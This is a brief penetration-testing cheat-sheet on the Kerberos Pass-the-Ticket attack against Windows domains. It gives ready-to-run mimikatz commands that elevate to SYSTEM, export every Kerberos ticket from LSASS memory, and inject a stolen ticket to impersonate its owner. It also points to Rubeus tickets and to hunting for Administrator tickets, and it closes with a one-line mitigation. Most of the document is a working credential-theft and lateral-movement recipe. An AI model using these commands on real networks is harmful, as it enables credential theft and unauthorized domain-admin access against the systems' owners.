Pass the Ticket

Overview

• Use mimikatz to dump TGT from LSASS memory

• Will give us .kirbi ticket which can be used to gain domain admin if ticket is from domain admin

• Reuse old ticket to impersonate that ticket

• Can also use base64-encoded tickets gathered with Rubeus

• Look for Administrator tickets

Exploitation

# Start mimikatz and get SYSTEM
mimikatz.exe
privilege::debug
token::elevate

# Export all .kirbi tickets to current directory
sekurlsa::tickets /export

# PTT with mimikatz
kerberos::ptt <ticket>

# List cached tickets
klist

Mitigation:

• Don't let domain admins log onto anything except the domain controller